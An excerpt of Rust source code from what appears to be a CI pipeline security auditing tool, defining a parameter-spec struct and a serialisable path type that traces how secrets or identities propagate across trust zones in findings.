1297pub struct ParamSpec {
1298    /// Declared parameter type (`string`, `number`, `boolean`, `object`, etc.).
1299    /// Empty string when the YAML omitted `type:` (ADO defaults to string).
1300    pub param_type: String,
1301    /// True when the parameter declares a `values:` allowlist that constrains
1302    /// the set of acceptable inputs. When true, free-form shell injection is
1303    /// not possible because the runtime rejects any value outside the list.
1304    pub has_values_allowlist: bool,
1305}
1306
1307// ── Propagation path (wire type for Finding.path) ────────────────
1308
1309/// A path that authority took through the graph.
1310/// The path is the product — it's what makes findings persuasive.
1311///
1312/// This is a **wire type**: it serialises into `Finding.path` in JSON output
1313/// and SARIF `properties.path`. The BFS algorithm that produces these paths
1314/// lives in `taudit-core::propagation` (workspace-internal); this struct is
1315/// the stable contract.
1316#[allow(missing_docs)]
1317#[derive(Debug, Clone, Serialize, Deserialize)]
1318pub struct PropagationPath {
1319    /// The authority origin (Secret or Identity).
1320    pub source: NodeId,
1321    /// Where authority ended up.
1322    pub sink: NodeId,
1323    /// The full edge path from source to sink.
1324    pub edges: Vec<EdgeId>,
1325    /// Did this path cross a trust zone boundary?
1326    pub crossed_boundary: bool,
1327    /// If crossed, from which zone to which zone.
1328    #[serde(skip_serializing_if = "Option::is_none")]
1329    pub boundary_crossing: Option<(TrustZone, TrustZone)>,
1330}
taudit_api/lib.rs

taudit_api/
lib.rs